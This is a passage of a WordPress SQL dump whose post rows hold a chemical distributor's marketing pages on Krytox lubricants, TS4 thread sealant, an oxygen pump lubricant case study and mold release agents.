cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT AC</a></td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Compatibility with Elastomers and Plastics</strong>\r\n\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<strong>Compatibility with Metals</strong>\r\n\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n\r\n<strong>Robust Electrical Properties</strong>\r\n\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n\r\n<strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong>\r\n\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n\r\n<strong>Cost-Effective</strong>\r\n\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-104/">Krytox™ GPL 104</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">Krytox™ GPL 204</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">Krytox™ GPL 214</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">Krytox™ XP2A4</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2045/">Krytox™ AUT 2045</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a></td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2a45/">Krytox™ AUT 2A45</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">Krytox™ GPL 215</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">Krytox™ XP2A5</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n\r\n<strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong>\r\n\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n\r\n<strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong>\r\n\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n\r\n<strong>The following Krytox lubricants are great automotive lubricants:</strong>\r\n\r\n[ux_product_categories ids="96,98,97,37,168" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\r\n\r\n&nbsp;', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-07 17:36:51', '2016-10-07 17:36:51', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2407, 54, '2016-10-07 17:51:37', '2016-10-07 17:51:37', '', '', '', 'publish', 'closed', 'closed', '', '2407', '', '', '2016-10-07 17:51:38', '2016-10-07 17:51:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/2407/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2408, 2, '2016-10-07 17:51:39', '2016-10-07 17:51:39', '<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n\r\n<strong>Key Benefits of Kytox™ TS4:</strong>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<strong>Recommended Product:</strong>\r\n\r\n[product id="989"]\r\n\r\nTo learn more about TS4 please visit <a href="https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/">https://www.miller-stephenson.com/product/ts4-krytox-thread-sealant/</a>', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2016-10-07 17:51:39', '2016-10-07 17:51:39', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2409, 2, '2016-10-07 18:00:23', '2016-10-07 18:00:23', 'The Krytox lubricant XP line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\n\nUsing Krytox XP 2A5 grease, the manufacturer was able to improve productivity by eliminating frequent downtime, due to bearing failures, as well as by extending the re-lubrication cycle from weekly to once\nevery seven weeks. The anti-corrosion protection of the additive in Krytox XP 2A5 grease reduces corrosion, and promotes longer grease and bearing life.', 'XP 2A5', 'Krytox XP 2A5 can be used in similar applications where bearings operate under high loads and the potential for corrosion exists.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '1012-autosave-v1', '', '', '2016-10-07 18:00:23', '2016-10-07 18:00:23', '', 1012, 'https://www.miller-stephenson.com/1012-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2410, 2, '2016-10-07 18:09:07', '2016-10-07 18:09:07', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Products:</strong>\r\n\r\n[product id="954"][product id="944"][product id="943"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Oxygen Pump Lubricant Case Study', '', 'publish', 'closed', 'closed', '', 'krytox-oxygen-pump-lubricant', '', '', '2016-10-12 19:51:18', '2016-10-12 19:51:18', '', 0, 'https://www.miller-stephenson.com/?p=2410', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2411, 3, '2016-10-07 18:03:30', '2016-10-07 18:03:30', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16,20" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-07 18:03:30', '2016-10-07 18:03:30', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2412, 2, '2016-10-07 18:09:07', '2016-10-07 18:09:07', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Product:</strong>\r\n\r\n[product_lookbook cat="krytox-lvp-vpf" products="8"]', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-07 18:09:07', '2016-10-07 18:09:07', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
